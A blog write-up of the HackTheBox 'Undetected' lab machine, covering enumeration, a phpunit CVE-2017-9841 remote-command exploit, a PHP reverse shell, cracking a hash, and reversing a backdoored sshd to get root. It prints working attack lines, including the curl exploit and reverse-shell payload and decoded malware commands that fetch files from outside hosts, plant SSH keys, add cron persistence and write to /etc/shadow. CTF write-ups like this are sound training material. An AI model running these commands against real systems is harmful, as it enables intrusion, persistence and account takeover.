d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-undetected-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

168 lines
6.2 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: "Writeup - Undetected (HTB)"
date: 2022-04-09
slug: "writeup-undetected-htb"
type: "writeup-ctf"
---
This is a writeup for the [Undectected](https://app.hackthebox.com/machines/Undetected) machine from  the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.10.11.146
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)
![](img/image-2.webp)
## Exploit
While going on the site I notice that there is a subdomain, so I add it in the /etc/hosts file:
```bash
10.10.11.146 store.djewelry.htb
```
![](img/image-3.webp)
I arrive on a new part of the site : the store. I start by searching for a folder with gobuster :
```bash
gobuster dir -u http://store.djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```
I quickly find the "/vendor" folder:
![](img/image-4.webp)
A lot of potential exploit... After some research I find that this version of "phpunit" has an exploit allowing to execute remote commands via PHP ([CVE-2017-9841](https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263)).
```bash
┌──(kali㉿kali)-[~]
└─$ curl --data "<?php system('id');?>" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
So I will be able to use this exploit to create a reverse shell. To do this I open a port with "nc", then I use the following command to start the session:
```bash
curl --data '<?php $sock=fsockopen("10.10.14.20",1234);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```
I now have a reverse shell. I'll do a first scan with [linPeas](lingeas.sh). After some analysis, I find a suspicious file in the "/var/backups" folder. After retrieving the file on my PC, I extract the information with the "strings" command.
In the result of the command I find a large hexadecimal character string that I decipher with the site [Hex decode](https://www.convertstring.com/EncodeDecode/HexDecode).
![](img/image-5.webp)
It is a sequence of commands:
```bash
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys;
wget tempfiles.xyz/.main -O /var/lib/.main;
chmod 755 /var/lib/.main;
echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd;
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _;
do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
```
One element is of particular interest to us, the hash of a user's password. I retrieve it and try to crack it with "john".
![](img/image-6.webp)
After a few seconds john finds the password: ihatehackers.
We don't have the user name, but during the linPeas scan, I found that there were 2 users besides root: steven & steven1.
Let's try with the two users:
![](img/image-7.webp)
So this is the password of steven1! I now have access to the first flag of the machine.
## Privilege escalation
Let's go back to our LinPeas scan. I noticed that the user steven had a mail in the folder "/var/mail" :
![](img/image-8.webp)
Globally the sysadmin tells us that there is a problem with apache, let's go and see in the apache folder if we notice any unusual elements.
In the molules folder, there are a lot of elements, but when I look at the modification dates, I notice that they have the same date except one : mod\_reader.so.
```bash
ls -l /usr/lib/apache/modules
```
![](img/image-9.webp)
I get the file on my computer and get the information with the command "strings". And as usual there is a big string, but this time in base64. I decrypt it with the following command :
```bash
┌──(kali㉿kali)-[~/Downloads]
└─$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
```
These are 2 commands that use the program "sshd", so I get the ssdh file for analysis with ghidra.
After the analysis of ghidra, I look if there are not unusual variables or functions. And I find a function that attracts my attention: auth\_password.
In this function I find the backdoor's signature and a sequence of hexadecimal characters composing a password. Let's try to recompose the password!
![](img/image-10.webp)
At first I put back in order the password bits. I notice that the first byte is negative, but when I right click on the value, ghidra tells me that it corresponds to "0xa5".
```bash
30_1 0xa5
28_2 0xa9f4
24_4 0xbcf0b5e3
16_8 0xb2d6f4a0fda0b3d6
12_4 0xfdb3d6e7
8_4 0xf7bbfdc8
4_4 0xa4b3a3f3
0_4 0xf0e7abd6
```
In total, I find that it corresponds to 31 bytes, it's a good sign it's the size of the "backdoor" variable!
I notice that at the end of the processing the following calculation is done: "\*pbVar4 = bVar7 ^ 0x96". This corresponds to an XOR with the value 96.
I have all the elements, so I should be able to find the password with the help of [CyberChef](https://gchq.github.io/CyberChef). I add the following modules:
- Swap endianness -> 31 word length
- From Hex
- XOR -> key : 96
{{< alert icon="circle-info" >}}
The "Swap endianness" function allows to convert little endian and big endian (or vice versa). These are two possibilities to store information.At the end cyberchef returns the following string:
{{< /alert >}}
```bash
@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
```
Let's try to connect to root with this password:
![](img/image-11.webp)
And it works, so I can get the last flag.
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Mettre a jour phpunit pour la dernière version
- Do not leave files with hashes visible to everyone / use stronger passwords
- Use key authentication for ssh root connection
Reference in New Issue View Git Blame Copy Permalink